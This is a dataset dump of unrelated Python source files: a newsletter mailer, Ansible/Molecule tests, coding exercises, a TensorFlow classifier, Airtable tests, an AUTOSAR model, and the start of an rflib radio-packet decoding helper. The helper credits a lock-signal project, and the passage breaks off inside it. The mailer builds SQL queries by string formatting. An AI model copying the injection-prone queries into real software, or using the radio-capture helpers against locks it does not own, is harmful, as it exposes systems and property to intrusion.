self.createMimeImageAttach(img.read())\n                    img.close()\n                    newtag = tag.replace(originalimgfn, attachid)\n                    newhtml = newhtml.replace(tag, newtag)\n                except:\n                    self.appendMessage(tr(\"File could not be opened:\") + \"%s\" %(imgfn))\n            \n        self.MessageBody = newhtml\n        self.save()\n\n    def doNewsletter(self): \n        selType = NewsletterSelectionType\n        self.mytext = self.MessageBody\n        #self.replaceClauses()\n        \n        cuentas = Query()\n        cuentas.sql = \"SELECT * FROM [MailAccount] WHERE {Mail}=s|%s| AND {User}=s|%s| \" % (self.MailFrom, currentUser())\n        cuentas.setLimit(1)\n        if (cuentas.open()):\n            for cuenta in cuentas: \n                server = cuenta.SMTPServer\n                port = cuenta.SMTPPort\n                sslflag = cuenta.SMTPReqSSL\n                if (not cuenta.SMTPAnonymous):\n                    user = cuenta.SMTPUser\n                    passwd = cuenta.SMTPPassword \n\n        dests = Query()\n        dests.sql = \"SELECT {Email} FROM [Person]\" \n        if(self.Labels):\n            labels = self.Labels.split(\",\")\n            for lb in labels: \n                dests.sql+=\"\"\" WHERE?AND ({Labels} like s|%s| or {Labels} like s|%s|\n                           or {Labels} like s|%s| or {Labels} like s|%s|)\"\"\" % (lb , lb+\",%\" , 
\"%,\"+lb , \"%,\"+lb+\",%\")\n \n cantMails = 0\n yaEnviados = 0\n total = 0\n if (dests.open()):\n total = dests.count()\n for mail in dests:\n chequeo = Query() \n chequeo.sql = \"SELECT {Id} FROM [Mail] WHERE {MailTo}=s|%s| AND {SentFlag}=i|1| AND {Newsletter}=i|%i|\" % (mail.Email, self.SerNr)\n if (chequeo.open()): \n if (chequeo.count() == 0): # Si no fue enviado ya...\n from HTMLRecordView import HTMLRecordView\n msg = HTMLRecordView.replaceNames(mail, self.mytext)\n msg = HTMLRecordView.replaceClauses(msg)\n if (self.GenerateMail(msg, mail.Email, server, port, user, passwd, sslflag)):\n cantMails += 1\n else:\n yaEnviados += 1\n\n self.appendMessage(\"%i de %i mails enviados (%i ya habian sido enviados)\" % (cantMails, total, yaEnviados))\n \n \n def GenerateMail(self, body, mailto, server, port, user=\"\", passwd=\"\", sslflag=None):\n res = False \n myMail = Mail()\n myMail.MailTo = mailto\n myMail.MailFrom = self.MailFrom\n myMail.Subject = self.Subject\n myMail.TransDate = today()\n myMail.TransTime = now()\n myMail.MessType = 0\n myMail.Status = 0\n myMail.SentFlag = False\n myMail.Mailing = self.SerNr\n myMail.Id = self.MessageId \n #myMail.save()\n \n attachids = self.mimeImageAttachIds()\n for tag in self.getIMGTags(body):\n attid = self.getFilenameFromIMG(tag)\n if attid in attachids:\n image = self.getAttachAsString(attid)\n newattid = myMail.createMimeImageAttach(image)\n newtag = tag.replace(attid, newattid)\n body = body.replace(tag, newtag)\n\n myMail.MessageBody = body\n myMail.ParentId = \"-1\" \n myMail.save() \n res = myMail.send(server, port, user, passwd, sslflag) \n if not res:\n self.appendMessage(res)\n self.save() \n commit()\n \n return res\n","sub_path":"standard/records/Newsletter.py","file_name":"Newsletter.py","file_ext":"py","file_size_in_byte":5946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"528036521","text":"import os\nimport yaml\nimport pytest\nimport testinfra.utils.ansible_runner\n\n\ntestinfra_hosts = testinfra.utils.ansible_runner.AnsibleRunner(\n os.environ['MOLECULE_INVENTORY_FILE']).get_hosts('all')\ndir_path = os.path.dirname(os.path.abspath(__file__))\n\n\n@pytest.fixture()\ndef AnsibleDefaults():\n with open(os.path.join(dir_path, './../../../defaults/main.yml'), 'r') as stream:\n return yaml.load(stream)\n\n@pytest.fixture()\ndef AnsiblePlaybook():\n with open(os.path.join(dir_path, './../playbook.yml'), 'r') as stream:\n return yaml.load(stream)\n\n\n@pytest.mark.parametrize('minio_bin_var', [\n 'minio_server_bin',\n 'minio_client_bin',\n])\ndef test_minio_installed(host, AnsibleDefaults, minio_bin_var):\n\n f = host.file(AnsibleDefaults[minio_bin_var])\n assert f.exists\n assert f.user == 'root'\n assert f.group == 'root'\n assert oct(f.mode) == '0o755'\n\n\ndef test_minio_server_data_directory(host, AnsibleDefaults, AnsiblePlaybook):\n\n playbpook = AnsiblePlaybook[0]\n for role in playbpook['roles']:\n layoutName = role['vars']['minio_layout']\n datadir = \"/var/lib/minio-{}\".format(layoutName)\n d = host.file(datadir)\n assert d.is_directory\n assert d.exists\n assert d.user == AnsibleDefaults['minio_user']\n assert d.group == AnsibleDefaults['minio_group']\n assert oct(d.mode) == '0o750'\n\n\ndef test_minio_server_webservers(host, AnsibleDefaults):\n\n for layoutName in AnsibleDefaults['minio_layouts'].keys():\n server_addr = AnsibleDefaults['minio_layouts'][layoutName]['server_addr']\n addr = \"tcp://127.0.0.1{}\".format(server_addr)\n 
assert host.socket(addr).is_listening\n","sub_path":"molecule/layouts/tests/test_minio_default.py","file_name":"test_minio_default.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"642295826","text":"import random\noffices = [[], [], []]\nteacher = [\"a\", \"b\", \"c\", \"d\", \"e\", \"f\", \"g\", \"h\"]\n\n# Assign each teacher from the list to a random office\nfor name in teacher:\n    index = random.randint(0, 2)\n    offices[index].append(name)\n\n# Show how many teachers each office has\ni = 1\nfor office in offices:\n    print(\"Office %d has %d people\"%(i, len(office)))\n    i += 1\n    for name in office:\n        print(\"%s\"%name, end=\"\\t\")\n    print(\"\\n\")\n    print(\"-\"*20)","sub_path":"给空列表随机分配人.py","file_name":"给空列表随机分配人.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"368571712","text":"\"\"\"\nGiven an array of strings, group anagrams together.\n\nFor example, given: [\"eat\", \"tea\", \"tan\", \"ate\", \"nat\", \"bat\"],\nReturn:\n\n[\n    [\"ate\", \"eat\",\"tea\"],\n    [\"nat\",\"tan\"],\n    [\"bat\"]\n]\n\nNote:\n\n    For the return value, each inner list's elements must follow the lexicographic order.\n    All inputs will be in lower-case.\n\"\"\"\ndef groupAnagrams(strs):\n    \"\"\"\n    :type strs: List[str]\n    :rtype: List[List[str]]\n    \"\"\"\n    anagrams = {}\n    for string in strs:\n        key = anagram_key(string)\n        anagram_list = anagrams.setdefault(key, [])\n        anagram_list.append(string)\n    return [sorted(l) for l in anagrams.values()]\n\n\ndef anagram_key(string):\n    letters = [0 for _ in xrange(26)]\n    for char in string:\n        index = ord(char) - ord('a')\n        letters[index] += 1\n    return \"#\".join([str(x) for x in letters])  # '#' separators keep multi-digit counts like [11, 1] and [1, 11] from colliding","sub_path":"leetcode/anagrams.py","file_name":"anagrams.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"10881316","text":"from collections import defaultdict\nbase_info = defaultdict(lambda:0)\nswitch = 0\n\nwith open('UKdata.txt', 'r') as input_data:\n    for line in input_data:\n        for i in range(len(line) - 3):\n            if(line[i:i+4] == '基礎情報'):\n                switch = 1\n        if switch == 1:\n            for j in range(len(line)):\n                if(line[j] == '='):\n                    base_info[line[1:j]] = line[j+2:]\n                    break\n                elif(line[j] == '*'):\n                    break\n                elif(line[j] == '}'):\n                    switch = 0\n    print(base_info)\n","sub_path":"naruhisa/chapter03/knock25.py","file_name":"knock25.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"635056052","text":"from django.urls import path\nfrom . 
import views\n\nurlpatterns = [\n    path('', views.home, name='home'),\n    path('login/', views.login_usuario, name='login'),\n    path('logout/', views.logout_usuario, name='logout'),\n    path('registrar/', views.registrar_usuario, name='registrar'),\n    path('editar_perfil/', views.editar_perfil, name='editar_perfil'),\n    path('mudar_senha/', views.mudar_senha, name='mudar_senha')\n]","sub_path":"autenticacao/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"67721394","text":"def languageClassification(sentence):\n    import re\n    eng = [ 'the','a','and','of','be','that','have','it','for','not']\n    fr = [ 'le','la','de','ne','et','un','pas','vous','etre','les','en','je']\n    span = [ 'los','las','un','allí','tener','pero','para','por','si','el','y','se','en']\n    ecount = 0\n    fcount = 0\n    scount = 0\n    \n    for word in eng:\n        if re.search(r'\\b' + word + r'\\b', sentence):  # whole-word match, so 'the' is not counted inside 'other'\n            ecount+=1\n    for word in fr:\n        if re.search(r'\\b' + word + r'\\b', sentence):\n            fcount+=1\n    for word in span:\n        if re.search(r'\\b' + word + r'\\b', sentence):\n            scount+=1\n    print(\"eng: \",ecount,\" fr: \",fcount,\" span: \",scount)\n    if(ecount>fcount and ecount>scount):\n        print(\"Language is English\")\n    elif(fcount>ecount and fcount>scount):\n        print(\"Language is French\")\n    elif(scount>ecount and scount>fcount):\n        print(\"Language is Spanish\")\n    else:\n        print(\"Language could not be determined\")\n    \n","sub_path":"NPL/Lab 4/languageClassifiction.py","file_name":"languageClassifiction.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"349802902","text":"\"\"\" Multilayer Perceptron.\nA Multilayer Perceptron (Neural Network) implementation example using\nTensorFlow library. 
This example is using the MNIST database of handwritten\ndigits (http://yann.lecun.com/exdb/mnist/).\nLinks:\n    [MNIST Dataset](http://yann.lecun.com/exdb/mnist/).\nAuthor: Aymeric Damien\nProject: https://github.com/aymericdamien/TensorFlow-Examples/\n\"\"\"\nfrom __future__ import print_function\n\n# Import MNIST data\nfrom project_utils import load_features, load_test_features\nimport tensorflow as tf\nimport numpy as np\n\npreprocesses = [\"None\", \"gaussian\", \"sqeeze\"]\nattacks = [\"None\", \"spatial_grid\", \"fgsm\", \"gsma\", \"spsa\"]\n \nx_train, y_train = load_features()\n\n# Parameters\nlearning_rate = 0.001\ntraining_epochs = 15\nbatch_size = 128\ndisplay_step = 1\n\n# Network Parameters\nn_hidden_1 = 256 # 1st layer number of neurons\nn_hidden_2 = 256 # 2nd layer number of neurons\nn_input = x_train.shape[1] # MNIST data input \nn_classes = y_train.shape[1] # MNIST total classes (6,7 digits)\n\n# tf Graph input\nX = tf.placeholder(\"float\", [None, n_input])\nY = tf.placeholder(\"float\", [None, n_classes])\n\n# Store layers weight & bias\nweights = {\n    'h1': tf.Variable(tf.random_normal([n_input, n_hidden_1])),\n    'h2': tf.Variable(tf.random_normal([n_hidden_1, n_hidden_2])),\n    'out': tf.Variable(tf.random_normal([n_hidden_2, n_classes]))\n}\nbiases = {\n    'b1': tf.Variable(tf.random_normal([n_hidden_1])),\n    'b2': tf.Variable(tf.random_normal([n_hidden_2])),\n    'out': tf.Variable(tf.random_normal([n_classes]))\n}\n\n\n# Create model\ndef multilayer_perceptron(x):\n    # Hidden fully connected layer with 256 neurons\n    layer_1 = tf.add(tf.matmul(x, weights['h1']), biases['b1'])\n    # Hidden fully connected layer with 256 neurons\n    layer_2 = tf.add(tf.matmul(layer_1, weights['h2']), biases['b2'])\n    # Output fully connected layer with a neuron for each class\n    out_layer = tf.matmul(layer_2, weights['out']) + biases['out']\n    return out_layer\n\n# Construct model\nlogits = multilayer_perceptron(X)\n\n# Define loss and optimizer\nloss_op = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(\n    logits=logits, labels=Y))\noptimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)\ntrain_op = optimizer.minimize(loss_op)\n# Initializing the variables\ninit = tf.global_variables_initializer()\n\n\ndef train():\n    # Add ops to save and restore all the variables.\n    saver = tf.train.Saver()\n    with tf.Session() as sess:\n        sess.run(init)\n\n        # Training cycle\n        for epoch in range(training_epochs):\n            avg_cost = 0.\n            total_batch = int(len(y_train)/batch_size)\n            # Loop over all batches\n            for i in range(total_batch):\n                # batch_x, batch_y = mnist.train.next_batch(batch_size)\n                batch_x = x_train[i*batch_size:min((i+1)*batch_size,len(y_train))]\n                batch_y = y_train[i*batch_size:min((i+1)*batch_size,len(y_train))]\n                # Run optimization op (backprop) and cost op (to get loss value)\n                _, c = sess.run([train_op, loss_op], feed_dict={X: batch_x,\n                                                                Y: batch_y})\n                # Compute average loss\n                avg_cost += c / total_batch\n            # Display logs per epoch step\n            if epoch % display_step == 0:\n                print(\"Epoch:\", '%04d' % (epoch+1), \"cost={:.9f}\".format(avg_cost))\n        print(\"Optimization Finished!\")\n        for preprocess in preprocesses:\n            for attack in attacks:\n                print(preprocess, attack)\n                feature, y_label = load_test_features(preprocess, attack)\n                # Test model\n                pred = tf.nn.softmax(logits)  # Apply softmax to logits\n                # run\n                prediction = pred.eval({X: feature, Y: y_label}) \n                # calculate metric\n                true_labels = np.argmax(y_label, axis=1)\n                pred_labels = np.argmax(prediction[:len(y_label)], axis=1)\n                # True 
Positive (TP): we predict a label of 1 (positive), and the true label is 1.\n                TP = np.sum(np.logical_and(pred_labels == 1, true_labels == 1))\n                \n                # True Negative (TN): we predict a label of 0 (negative), and the true label is 0.\n                TN = np.sum(np.logical_and(pred_labels == 0, true_labels == 0))\n                \n                # False Positive (FP): we predict a label of 1 (positive), but the true label is 0.\n                FP = np.sum(np.logical_and(pred_labels == 1, true_labels == 0))\n                \n                # False Negative (FN): we predict a label of 0 (negative), but the true label is 1.\n                FN = np.sum(np.logical_and(pred_labels == 0, true_labels == 1))\n\n                recall = TP/float(TP+FN)\n                precision = TP/float(TP+FP)\n                f1 = 2.*TP/(2.*TP + FP + FN) \n\n                correct_prediction = tf.equal(tf.argmax(pred, 1), tf.argmax(Y, 1))\n                # Calculate accuracy\n                accuracy = tf.reduce_mean(tf.cast(correct_prediction, \"float\"))\n                print(\"Accuracy:\", accuracy.eval({X: x_train, Y: y_train}))\n                print(preprocess, attack, \"accuracy\", accuracy.eval({X: feature, Y: y_label}))\n                print(preprocess, attack, \"precision\", precision)\n                print(preprocess, attack, \"recall\", recall)\n                print(preprocess, attack, \"f1\", f1)\n\n    # Save the variables to disk.\n    # save_path = saver.save(sess, \"../models/mighty.ckpt\")\n\ndef evaluate():\n    preprocesses = [\"None\", \"gaussian\", \"sqeeze\"]\n    attacks = [\"None\", \"spatial_grid\", \"fgsm\", \"gsma\", \"spsa\"]\n    # Add ops to save and restore all the variables.\n    saver = tf.train.Saver(max_to_keep=5, keep_checkpoint_every_n_hours=1)\n\n    # Later, launch the model, use the saver to restore variables from disk, and\n    # do some work with the model.\n    with tf.Session() as sess:\n        # Restore variables from disk.\n        saver.restore(sess, tf.train.latest_checkpoint('../models/'))\n        for preprocess in preprocesses:\n            for attack in attacks:\n                print(preprocess, attack)\n                feature, y_label = load_test_features(preprocess, attack)\n                logits = sess.run('Softmax', \n                        feed_dict={X: feature, Y: y_label})\n                print(logits)\n                \n                # Test model\n                pred = tf.nn.softmax(logits) # Apply softmax to logits\n                # run\n                prediction = pred.eval({X: feature, Y: y_label}) \n                # calculate metric\n                true_labels = np.argmax(y_label, axis=1)\n                pred_labels = np.argmax(prediction[:len(y_label)], axis=1)\n                # True Positive (TP): we predict a label of 1 (positive), and the true label is 1.\n                TP = np.sum(np.logical_and(pred_labels == 1, true_labels == 1))\n                \n                # True Negative (TN): we predict a label of 0 (negative), and the true label is 0.\n                TN = np.sum(np.logical_and(pred_labels == 0, true_labels == 0))\n                \n                # False Positive (FP): we predict a label of 1 (positive), but the true label is 0.\n                FP = np.sum(np.logical_and(pred_labels == 1, true_labels == 0))\n                \n                # False Negative (FN): we predict a label of 0 (negative), but the true label is 1.\n                FN = np.sum(np.logical_and(pred_labels == 0, true_labels == 1))\n\n                recall = TP/float(TP+FN)\n                precision = TP/float(TP+FP)\n                f1 = 2.*TP/(2.*TP + FP + FN) \n\n                correct_prediction = tf.equal(tf.argmax(pred, 1), tf.argmax(Y, 1))\n                # Calculate accuracy before any of the metric printouts use it\n                accuracy = tf.reduce_mean(tf.cast(correct_prediction, \"float\"))\n                print(preprocess, attack, \"accuracy\", accuracy.eval({X: feature, Y: y_label}))\n                print(preprocess, attack, \"precision\", precision)\n                print(preprocess, attack, \"recall\", recall)\n                print(preprocess, attack, \"f1\", f1)\n\n                print(\"Accuracy:\", accuracy.eval({X: feature, Y: 
y_label}))\ntrain()\n#evaluate()","sub_path":"cleverhans_tutorials/MLP.py","file_name":"MLP.py","file_ext":"py","file_size_in_byte":8193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"388522360","text":"from wikitongues.wikitongues.data_store.airtable.airtable_item_data_store import AirtableItemDataStore # noqa: E501\nfrom wikitongues.wikitongues.data_store.airtable.airtable_http_client import IAirtableHttpClient # noqa: E501\nfrom wikitongues.wikitongues.data_store.airtable.airtable_item_id_provider import AirtableItemIdProvider # noqa: E501\nfrom wikitongues.wikitongues.data_store.airtable.airtable_item_formatter import IAirtableItemFormatter # noqa: E501\nfrom wikitongues.wikitongues.data_store.airtable.airtable_item_extractor import IAirtableItemExtractor # noqa: E501\n\nfrom wikitongues.wikitongues.data_store.error_response import ErrorResponse\n\nfrom wikitongues.wikitongues.items import WikitonguesItem\n\nimport unittest\nimport json\n\nEXPECTED_URL = 'aaa.com'\nEXPECTED_ISO = 'aaa'\nEXPECTED_NULL_URL = 'newsite.com/notyetcrawled'\nEXPECTED_JSON = '{\"records\": [{\"a\": \"a\"}]}'\nEXPECTED_NULL_JSON = '{\"records\": []}'\n\nEXPECTED_ITEM = WikitonguesItem(\n title='Title',\n url='aaa.com',\n language_id='aaa',\n spider_name='test'\n)\n\nEXPECTED_FIELDS = {\n 'Title': 'Title',\n 'Url': 'aaa.com',\n 'Language': [\n 'rec12345'\n ]\n}\n\n\nclass MockAirtableHttpClient(IAirtableHttpClient):\n def list_records(self):\n return MockResponse()\n\n def get_record(self, id):\n if id == f'{EXPECTED_ISO}:{EXPECTED_URL}':\n return MockResponse(EXPECTED_JSON)\n\n return MockResponse()\n\n def create_record(self, fields):\n if fields == EXPECTED_FIELDS:\n return MockResponse()\n\n return MockResponse(status_code=500)\n\n\nclass MockAirtableItemExtractor(IAirtableItemExtractor):\n def extract_items_from_json(self, json_obj, *args):\n result = ErrorResponse()\n\n if len(json_obj['records']) == 0:\n result.data = []\n elif json.dumps(json_obj) == EXPECTED_JSON:\n result.data = [EXPECTED_ITEM]\n\n return result\n\n def extract_item_from_json(self, json_obj):\n pass\n\n\nclass MockAirtableItemFormatter(IAirtableItemFormatter):\n def get_fields_dict(self, item):\n if item == EXPECTED_ITEM:\n return EXPECTED_FIELDS\n\n return {}\n\n\nclass MockResponse:\n def __init__(self, text=EXPECTED_NULL_JSON, status_code=200):\n self.text = text\n self.status_code = status_code\n\n\nclass TestAirtableItemDataStore(unittest.TestCase):\n def setUp(self):\n http_client = MockAirtableHttpClient()\n item_extractor = MockAirtableItemExtractor()\n item_formatter = MockAirtableItemFormatter()\n id_provider = AirtableItemIdProvider()\n self.data_store = AirtableItemDataStore(\n http_client, item_extractor, item_formatter, id_provider)\n\n def test_get_item(self):\n result = self.data_store.get_item(EXPECTED_URL, EXPECTED_ISO)\n\n self.assertEqual(EXPECTED_ITEM, result.data)\n\n def test_get_item__null_id(self):\n result = self.data_store.get_item(EXPECTED_NULL_URL, EXPECTED_ISO)\n\n self.assertIsNone(result.data)\n self.assertFalse(result.has_error())\n\n def test_create_item(self):\n result = self.data_store.create_item(EXPECTED_ITEM)\n\n self.assertFalse(result.has_error())\n","sub_path":"test/test_airtable_item_data_store.py","file_name":"test_airtable_item_data_store.py","file_ext":"py","file_size_in_byte":3202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"290478248","text":"import demistomock as demisto 
# noqa: F401\nfrom CommonServerPython import *  # noqa: F401\n\nBLACK_HTML_STYLE = \"color:#555555;text-align:center;font-size:200%;\"\n\n\ndef main():\n    try:\n        alert = demisto.context().get('Core', {}).get('OriginalAlert')[0]\n        event = alert.get('event')\n        regionName = event.get('region')\n\n        html = f\"<h1 style='{BLACK_HTML_STYLE}'>{str(regionName)}</h1>\"\n\n        return return_results({\n            'ContentsFormat': EntryFormat.HTML,\n            'Type': EntryType.NOTE,\n            'Contents': html,\n        })\n    except Exception as e:\n        return_error(f\"An error occurred: {str(e)}\")\n\n\nif __name__ in [\"__main__\", \"builtin\", \"builtins\"]:\n    return_results(main())\n","sub_path":"Packs/CloudIncidentResponse/Scripts/EntryWidgetRegionNameXCLOUD/EntryWidgetRegionNameXCLOUD.py","file_name":"EntryWidgetRegionNameXCLOUD.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"85945680","text":"import gmhttp\nimport unittest\nimport os\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nimport sys\nsys.path.append(BASE_DIR)\nfrom common.get_config import g\n\nfunc = os.path.basename(__file__).split('_test.py')[0]\nfrom common.gmpackage import *\n@ddt\nclass Coupon_Use_Coupon_Price(unittest.TestCase):\n    '''\n    SKU post-coupon price API\n    '''\n\n    @classmethod\n    def setUpClass(cls):\n        # setUpClass is a classmethod, so attributes go on cls\n        cls.host = g.host\n        cls.api_name = g.api_name(func)\n        cls.url = cls.host + cls.api_name\n        print('Fetching environment and API info')\n        cls.android_params = g.android_params\n    @data(*(get_values(func, \"test_coupon_use_coupon_price\")))\n    def test_coupon_use_coupon_price(self,value):\n        self._testMethodDoc = \"--\"\n        '''\n        SKU post-coupon price API\n        '''\n        url = self.host + self.api_name+ \"?\" + self.android_params\n        r = gmhttp.get(url,verify=False)\n        self.assertEqual(r.status_code,200,'Status code is not 200!')\n        r = r.json()\n        self.assertEqual(r.get(\"error\"),0)\n        print('Test case finished!')\n\n\n    def tearDown(self):\n        pass\n\n\nif __name__ == \"__main__\":\n    unittest.main()","sub_path":"testCase/coupon_use_coupon_price_test.py","file_name":"coupon_use_coupon_price_test.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"330863572","text":"from dataclasses import dataclass, field\nfrom typing import List, Optional, Type\nfrom .binding_time_enum_simple import BindingTimeEnumSimple\nfrom .interval_type_enum_simple import IntervalTypeEnumSimple\nfrom .ref import Ref\nfrom .sw_systemconst_subtypes_enum import SwSystemconstSubtypesEnum\n\n__NAMESPACE__ = \"http://autosar.org/schema/r4.0\"\n\n\n@dataclass\nclass Limit:\n    \"\"\"This class represents the ability to express a numerical limit.\n\n    Note that this is in fact a NumericalValuationPoint but has the\n    additional attribute intervalType. Note that the xml.name is \"LIMIT\"\n    for backward compatibility reasons.\n\n    :ivar s: Checksum calculated by the user's tool environment for an\n        ArObject. May be used in an own tool environment to determine if\n        an ArObject has changed. The checksum has no semantic meaning\n        for an AUTOSAR model and there is no requirement for AUTOSAR\n        tools to manage the checksum.\n    :ivar t: Timestamp calculated by the user's tool environment for an\n        ArObject. May be used in an own tool environment to determine\n        the last change of an ArObject. The timestamp has no semantic\n        meaning for an AUTOSAR model and there is no requirement for\n        AUTOSAR tools to manage the timestamp.\n    :ivar binding_time: This is the binding time in which the attribute\n        value needs to be bound. If this attribute is missing, the\n        attribute is not a variation point. 
In particular this means\n that It needs to be a single value according to the type\n specified in the pure model. It is an error if it is still a\n formula.\n :ivar blueprint_value: This represents a description that documents\n how the value shall be defined when deriving objects from the\n blueprint.\n :ivar sd: This special data is provided to allow synchronization of\n Attribute value variation points with variant management\n systems. The usage is subject of agreement between the involved\n parties.\n :ivar short_label: This allows to identify the variation point. It\n is also intended to allow RTE support for CompileTime Variation\n points.\n :ivar interval_type: This specifies the type of the interval. If the\n attribute is missing the interval shall be considered as\n \"CLOSED\".\n :ivar content:\n \"\"\"\n class Meta:\n name = \"LIMIT\"\n\n s: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"S\",\n \"type\": \"Attribute\",\n }\n )\n t: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"T\",\n \"type\": \"Attribute\",\n \"pattern\": r\"([0-9]{4}-[0-9]{2}-[0-9]{2})(T[0-9]{2}:[0-9]{2}:[0-9]{2}(Z|([+\\-][0-9]{2}:[0-9]{2})))?\",\n }\n )\n binding_time: Optional[BindingTimeEnumSimple] = field(\n default=None,\n metadata={\n \"name\": \"BINDING-TIME\",\n \"type\": \"Attribute\",\n }\n )\n blueprint_value: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"BLUEPRINT-VALUE\",\n \"type\": \"Attribute\",\n }\n )\n sd: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"SD\",\n \"type\": \"Attribute\",\n }\n )\n short_label: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"SHORT-LABEL\",\n \"type\": \"Attribute\",\n \"max_length\": 128,\n \"pattern\": r\"[a-zA-Z]([a-zA-Z0-9]|_[a-zA-Z0-9])*_?\",\n }\n )\n interval_type: Optional[IntervalTypeEnumSimple] = field(\n default=None,\n metadata={\n \"name\": \"INTERVAL-TYPE\",\n \"type\": \"Attribute\",\n }\n )\n content: List[object] = field(\n default_factory=list,\n metadata={\n \"type\": \"Wildcard\",\n \"namespace\": \"##any\",\n \"mixed\": True,\n \"choices\": (\n {\n \"name\": \"SYSC-STRING-REF\",\n \"type\": Type[\"Limit.SyscStringRef\"],\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n },\n {\n \"name\": \"SYSC-REF\",\n \"type\": Type[\"Limit.SyscRef\"],\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n },\n ),\n }\n )\n\n @dataclass\n class SyscStringRef(Ref):\n dest: Optional[SwSystemconstSubtypesEnum] = field(\n default=None,\n metadata={\n \"name\": \"DEST\",\n \"type\": \"Attribute\",\n \"required\": True,\n }\n )\n\n @dataclass\n class SyscRef(Ref):\n dest: Optional[SwSystemconstSubtypesEnum] = field(\n default=None,\n metadata={\n \"name\": \"DEST\",\n \"type\": \"Attribute\",\n \"required\": True,\n }\n )\n","sub_path":"autosar/models/limit.py","file_name":"limit.py","file_ext":"py","file_size_in_byte":4949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"130075335","text":"# The MIT License (MIT)\n#\n# Copyright (c) 2016 Leon Jacobs\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The 
above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\nimport sys\nfrom collections import Counter\n\nimport click\nimport numpy\nimport rflib\n\n\ndef valid_packet(packet, constraint):\n \"\"\"\n Check if a hex encoded packet received from\n rflib.Rfcat.RFrecv has the constraint value in it.\n\n Idea From:\n https://github.com/mossmann/stealthlock/blob/master/sl.py#L17\n\n :param packet:\n :param constraint:\n :return:\n \"\"\"\n\n if constraint not in packet:\n return False\n\n return True\n\n\ndef pwm_decode(p):\n \"\"\"\n PWM-ify a received packet.\n Source:\n From https://github.com/mossmann/stealthlock/blob/master/sl.py#L37\n\n :param p:\n :return:\n \"\"\"\n\n biginteger = 0\n\n for byte in p:\n biginteger <<= 8\n biginteger |= ord(byte)\n\n biginteger >>= 12\n out = 0\n\n for i in range(28, (len(p) * 8 - 12) / 3, 1):\n out <<= 1\n out |= ((biginteger & 1) ^ 1)\n biginteger >>= 3\n\n return out\n\n\ndef oneline_print(string):\n \"\"\"\n Print a string with a carriage return\n\n :param string:\n :return:\n \"\"\"\n\n sys.stdout.write('{}\\r'.format(string))\n sys.stdout.flush()\n\n\ndef chunks(data, l):\n \"\"\"\n Yield l-sized chunks from data.\n\n :param data:\n :param l:\n :return:\n \"\"\"\n\n for i in range(0, len(data), l):\n yield data[i:i + l]\n\n\ndef cleanup_wave_data(data):\n \"\"\"\n\n :param data:\n :return:\n \"\"\"\n\n # Determine the min, max and average values.\n minval, maxval, valcount = numpy.amin(data), numpy.amax(data), len(data)\n meanval = numpy.mean([minval, maxval])\n click.secho('Total Samples: {}, Min: {}, Max: {}, Mean: {}'.format(\n valcount, minval, maxval, meanval), fg='green')\n\n # Give some information about what is going to happen now.\n click.secho('Cleaning up {} data points...'.format(valcount), dim=True)\n\n # Some constant values that will determine hard values\n # for legit data\n sample_border = 40000 # Calculate averages every x samples\n significant_max = minval + 3000 # Must have at least one data point with more than this\n clean_data = []\n\n # Ensure the source data is OK to work with by checking that we have\n # data points with at least a certain max and not less than a certain min\n if maxval < significant_max:\n click.secho('Data source has values that are not more than {}. These '\n 'values may skew average calculations. 
